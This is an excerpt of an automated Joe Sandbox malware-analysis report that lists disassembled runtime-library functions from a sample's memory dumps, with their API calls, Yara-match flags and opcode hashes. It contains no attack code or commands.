                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 00432349
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3864826663-0
                                                                                                                                                                                                                                                                                      • Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                                                                                                                                                                                                      • Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698
                                                                                                                                                                                                                                                                                      Function 024F1129 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F1444
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F145D
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F148F
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F1498
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024F14A4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorLast
                                                                                                                                                                                                                                                                                      • String ID: C
                                                                                                                                                                                                                                                                                      • API String ID: 3291180501-1037565863
                                                                                                                                                                                                                                                                                      • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                                                                                                                                                                                                      • Instruction ID: 6a463bac80b8cea68074eaabba28607f2c70697511ba6ab4a69f72bd26ec6326
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29B12775A0121ADBDB64DF18C984BAEB7B5FB88314F1045AEDA0DA7350D770AE90CF40
                                                                                                                                                                                                                                                                                      Function 024FA115 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                                                                                                                                                                                                      • Instruction ID: b5a4c6b52f6f898d8f653f2790c7ca7625b2d9d3b143d184c2ffadd173a26ac3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A061F271A00215AFDBA0CF69C841B9ABBF5EF84710F2541ABEA58EB341D771A941CB50
                                                                                                                                                                                                                                                                                      Function 00439EAE Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                                                                                                                                                                                                      • Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59
                                                                                                                                                                                                                                                                                      Function 024F3AEA Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetConsoleCP.KERNEL32(?,024EC4A4,E0830C40,?,?,?,?,?,?,024F425F,024CE03C,024EC4A4,?,024EC4A4,024EC4A4,024CE03C), ref: 024F3B2C
                                                                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 024F3BA7
                                                                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 024F3BC2
                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,024EC4A4,00000001,?,00000005,00000000,00000000), ref: 024F3BE8
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,024F425F,00000000,?,?,?,?,?,?,?,?,?,024F425F,024CE03C), ref: 024F3C07
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,024CE03C,00000001,024F425F,00000000,?,?,?,?,?,?,?,?,?,024F425F,024CE03C), ref: 024F3C40
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
                                                                                                                                                                                                                                                                                      • Instruction ID: 8770ec38e9b0aeb753cb32315334256fefbe27451603a83cc668d9e1a599ff44
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D51C575900289AFDB10CFA8D884AEEBBF4EF49704F14419FE655E7291D7309A81CB64
                                                                                                                                                                                                                                                                                      Function 00433883 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
                                                                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 00433940
                                                                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 0043395B
                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                                                                                                                                                                                                                                                      • Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69
                                                                                                                                                                                                                                                                                      Function 024E4AB4 Relevance: 10.6, APIs: 7, Instructions: 104threadCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 024E4ACD
                                                                                                                                                                                                                                                                                        • Part of subcall function 024E4D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,024E4800), ref: 024E4DAC
                                                                                                                                                                                                                                                                                      • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 024E4AE2
                                                                                                                                                                                                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024E4AF1
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024E4AFF
                                                                                                                                                                                                                                                                                      • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 024E4B75
                                                                                                                                                                                                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024E4BB5
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024E4BC3
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3151764488-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                                                                      • Instruction ID: 2ea8a0853e9e86f2de4b29290f49ad23bc5bce756762d402b32a1c8f3249b468
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C31B639A002149FDF04EF69C881B6E73B6FF44725F20456BD92697351DB70EA05CB94
                                                                                                                                                                                                                                                                                      Function 024FFBA8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                                                                                                                                                                                                      • Instruction ID: e6ab7ff3c47bba42d778d37706de1a90f88c636105697c1691e707d1ea793f03
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0311B471604165BBEB612F778C48D6B7A9DFFC2B31B12066BFD16D7290DA308845CAB0
                                                                                                                                                                                                                                                                                      Function 0043F941 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                                                                                                                                                                                                      • Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669
                                                                                                                                                                                                                                                                                      Function 024FA5EA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 024FA331: _free.LIBCMT ref: 024FA35A
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA638
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F36D1: HeapFree.KERNEL32(00000000,00000000,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?), ref: 024F36E7
                                                                                                                                                                                                                                                                                        • Part of subcall function 024F36D1: GetLastError.KERNEL32(?,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?,?), ref: 024F36F9
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA643
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA64E
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA6A2
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA6AD
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA6B8
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 024FA6C3
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                                                      • Instruction ID: be180c3adb70505bde73375396f051b30b6fbbecdb948a331ced7e905a8ed422
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5211F171644B54AAEEB0BBB3CC45FCF7B9EDF84B00F40482EA39DAA150DAA5B5144E50
                                                                                                                                                                                                                                                                                      Function 0043A383 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A3D1
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                                        • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A3DC
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A3E7
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A43B
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A446
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A451
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A45C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                                                      • Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46
                                                                                                                                                                                                                                                                                      Function 024D2659 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,024D0DA0,?,?,?,00000000), ref: 024D2667
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024D0DA0,?,?,?,00000000), ref: 024D266D
                                                                                                                                                                                                                                                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,024D0DA0,?,?,?,00000000), ref: 024D269A
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024D0DA0,?,?,?,00000000), ref: 024D26A4
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024D0DA0,?,?,?,00000000), ref: 024D26B6
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D26CC
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024D26DA
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4227777306-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                                                                                                                                                                                                      • Instruction ID: 26e38f2dac3e4023e2e5585a06d76b5f3be93a43b9b04ccd42e2cf5fe1bf0ba3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D01F73D500215A7DB20FF66EC18FAF3B78AF42F52B10043BF802D2161DBA4D9048AA8
                                                                                                                                                                                                                                                                                      Function 004123F2 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
                                                                                                                                                                                                                                                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00412473
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4227777306-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                                                                                                                                                                                                      • Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D
                                                                                                                                                                                                                                                                                      Function 024D24A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,024D670B), ref: 024D24B6
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024D24C4
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024D24D2
                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,024D670B), ref: 024D2500
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 024D2507
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,024D670B), ref: 024D2522
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,024D670B), ref: 024D252E
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D2544
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024D2552
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                                      • String ID: kernel32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                                                                      • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                                                                      • Instruction ID: ebd6521cd78994c65d6b730ff413855624693a4e360f8ace3d365fa691f2760a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03F086759043103FB7117B757C6D91B3FADDD46A22320062BF811E2292EBB585418558
                                                                                                                                                                                                                                                                                      Function 0040C618 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 37COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
